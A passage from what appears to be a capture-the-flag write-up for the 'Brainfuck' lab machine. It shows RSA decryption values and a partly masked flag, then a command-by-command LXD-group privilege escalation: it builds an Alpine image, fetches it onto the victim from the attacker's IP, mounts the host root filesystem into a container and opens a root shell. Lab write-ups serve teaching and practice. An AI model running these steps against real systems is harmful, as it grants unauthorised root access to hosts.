n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
6efc1a5dxxxxxxxxbb8ef
We got the root flag the box .
Beyond root flag: How to get the root access. Link to heading
Since we get the root flag, we can say box is finished. However how to get root access privilege
As per checking the user privilege , there is one thing which can help us escalating the privilege.User belong lxd group
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
There are some exploits which shows the lxd privileges can be escalated.
On Kali machine: Link to heading
Download and build the alpine image
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine 130 ⨯
--2022-04-13 21:18:47-- http://wget/
Resolving wget (wget)... failed: Name or service not known.
wget: unable to resolve host address ‘wget’
--2022-04-13 21:18:47-- https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8060 (7.9K) [text/plain]
Saving to: ‘build-alpine.1’
build-alpine.1 100%[========================================================================================>] 7.87K --.-KB/s in 0s
2022-04-13 21:18:48 (71.7 MB/s) - ‘build-alpine.1’ saved [8060/8060]
FINISHED --2022-04-13 21:18:48--
Total wall clock time: 0.6s
Downloaded: 1 files, 7.9K in 0s (71.7 MB/s)
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ sudo bash build-alpine 4 ⨯
Determining the latest release... v3.15
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.15/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.12.7-r3.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2575 100 2575 0 0 403 0 0:00:06 0:00:06 --:--:-- 481
--2022-04-13 21:19:35-- http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2575 (2.5K) [text/plain]
Saving to: ‘/home/rocky/hckbox/brainfuck/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’
/home/rocky/hckbox/brainfuck/rootfs/usr/sh 100%[========================================================================================>] 2.51K --.-KB/s in 0s
2022-04-13 21:19:36 (317 MB/s) - ‘/home/rocky/hckbox/brainfuck/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2575/2575]
Selecting mirror http://mirrors.tuna.tsinghua.edu.cn/alpine//v3.15/main
fetch http://mirrors.tuna.tsinghua.edu.cn/alpine//v3.15/main/x86_64/APKINDEX.tar.gz
(1/20) Installing musl (1.2.2-r7)
(2/20) Installing busybox (1.34.1-r5)
Executing busybox-1.34.1-r5.post-install
(3/20) Installing alpine-baselayout (3.2.0-r18)
Executing alpine-baselayout-3.2.0-r18.pre-install
Executing alpine-baselayout-3.2.0-r18.post-install
(4/20) Installing ifupdown-ng (0.11.3-r0)
(5/20) Installing openrc (0.44.7-r5)
Executing openrc-0.44.7-r5.post-install
(6/20) Installing alpine-conf (3.13.1-r0)
(7/20) Installing ca-certificates-bundle (20211220-r0)
(8/20) Installing libcrypto1.1 (1.1.1n-r0)
(9/20) Installing libssl1.1 (1.1.1n-r0)
(10/20) Installing libretls (3.3.4-r3)
(11/20) Installing ssl_client (1.34.1-r5)
(12/20) Installing zlib (1.2.12-r0)
(13/20) Installing apk-tools (2.12.7-r3)
(14/20) Installing busybox-suid (1.34.1-r5)
(15/20) Installing busybox-initscripts (4.0-r5)
Executing busybox-initscripts-4.0-r5.post-install
(16/20) Installing scanelf (1.3.3-r0)
(17/20) Installing musl-utils (1.2.2-r7)
(18/20) Installing libc-utils (0.7.2-r3)
(19/20) Installing alpine-keys (2.4-r1)
(20/20) Installing alpine-base (3.15.4-r0)
Executing busybox-1.34.1-r5.trigger
OK: 9 MiB in 20 packages
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ ls
40939.txt alltcp.txt alpine-v3.15-x86_64-20220413_2119.tar.gz
On Victim machine: Link to heading
Copy the tar.gz file( alpine image) to victim machine
import a image for lxd
initialize image
mount the container to /root
cd /tmp
orestis@brainfuck:/tmp$ wget http://10.10.14.5/alpine-v3.15-x86_64-20220413_2119.tar.gz
--2022-04-14 04:34:30-- http://10.10.14.5/alpine-v3.15-x86_64-20220413_2119.tar.gz
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3241097 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.15-x86_64-20220413_2119.tar.gz’
alpine-v3.15-x86_64-20220413_2119.tar.gz 100%[========================================================================================>] 3.09M 3.69MB/s in 0.8s
2022-04-14 04:34:31 (3.69 MB/s) - ‘alpine-v3.15-x86_64-20220413_2119.tar.gz’ saved [3241097/3241097]
orestis@brainfuck:/tmp$ lxc image import ./alpine-v3.15-x86_64-20220411_1049.tar.gz --alias newimage
error: open ./alpine-v3.15-x86_64-20220411_1049.tar.gz: no such file or directory
orestis@brainfuck:/tmp$ lxc image import ./alpine-v3.15-x86_64-20220413_2119.tar.gz --alias newimage
Image imported with fingerprint: c87829dd35ed7e40f0fed6a050e22df61eeefa31b86327e368782d37fe4a7bf1
orestis@brainfuck:/tmp$ lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| alpine | 3d89962ff185 | no | alpine v3.15 (20220411_10:49) | x86_64 | 3.09MB | Apr 11, 2022 at 3:06pm (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| newimage | c87829dd35ed | no | alpine v3.15 (20220413_21:19) | x86_64 | 3.09MB | Apr 14, 2022 at 1:35am (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+------------------------------+
orestis@brainfuck:/tmp$
- initialize image
orestis@brainfuck:/tmp$ lxc config device add rchitect mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to rchitect
orestis@brainfuck:/tmp$ lxc start rchitect
orestis@brainfuck:/tmp$ lxc exec rchitect /bin/sh
~ # whomai
/bin/sh: whomai: not found
~ # whoami
root
~ # id
uid=0(root) gid=0(root)
~ #
You can get the root flag like this way by accessing /mnt/root/root folder as well
/mnt/root # cd /mnt/root
/mnt/root # cd root
/mnt/root/root # ls
root.txt
/mnt/root/root #